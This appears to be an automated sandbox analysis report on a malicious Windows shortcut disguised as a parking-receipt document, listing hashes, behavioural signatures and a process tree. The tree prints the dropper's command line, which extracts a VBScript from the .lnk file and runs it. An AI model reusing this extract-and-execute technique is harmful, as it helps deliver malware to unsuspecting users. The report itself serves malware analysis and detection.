Analysis
-
max time kernel
93s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
09-05-2024 17:34
Static task
static1
Behavioral task
behavioral1
Sample
Parking_Receipt_5.doc.lnk
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Parking_Receipt_5.doc.lnk
Resource
win10v2004-20240508-en
General
-
Target
Parking_Receipt_5.doc.lnk
-
Size
9KB
-
MD5
2ef37d3814879f5c1e57bbb61642e6f7
-
SHA1
a8ead0c5e0b5e150f9f8945065e151434991123f
-
SHA256
eb17b9b7a32be1e5056b599e859e3bf46b0c55fd7334775f5b3548f49a74d8ce
-
SHA512
bbd46965cdf208d97fa2093f19d4eb1a05ebc4fff2885f9c75cbc345b7009ff30b6e3d8b2d14b3486aeda7be6c754946bdcec5b034db78888773933eff91b9a0
-
SSDEEP
96:8Bdb3k4wk2houqRHMEA3ws/c1T0RdoyG37uv:8BRURhm2cs/cB0Tc3K
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1388 wrote to memory of 2072 1388 cmd.exe cmd.exe PID 1388 wrote to memory of 2072 1388 cmd.exe cmd.exe PID 2072 wrote to memory of 2384 2072 cmd.exe findstr.exe PID 2072 wrote to memory of 2384 2072 cmd.exe findstr.exe PID 2072 wrote to memory of 4312 2072 cmd.exe WScript.exe PID 2072 wrote to memory of 4312 2072 cmd.exe WScript.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Parking_Receipt_5.doc.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c zlAIE & (findstr "execu.*" Parking_Receipt_5.doc.lnk > "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs" & "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs") & yJYAz2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\findstr.exefindstr "execu.*" Parking_Receipt_5.doc.lnk3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gnzoM.vbs"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\gnzoM.vbsFilesize
7KB
MD50ccb5ac219b4bca69895368631d4d951
SHA19d27df981760e94871b5bd9850fe4ce95ed11ede
SHA256c6e8e7340deba567e9e908ec7e909b669882bde38690cf372bdcdfa2eb77bc99
SHA51243fb935c8075820e2f68c0eb345c02c6588cd0f1355da94865cb683bd5964783ebfc8d3182285d2fd09fd8779e62166873dd9965e742e1b6b0e291e1bda9e87a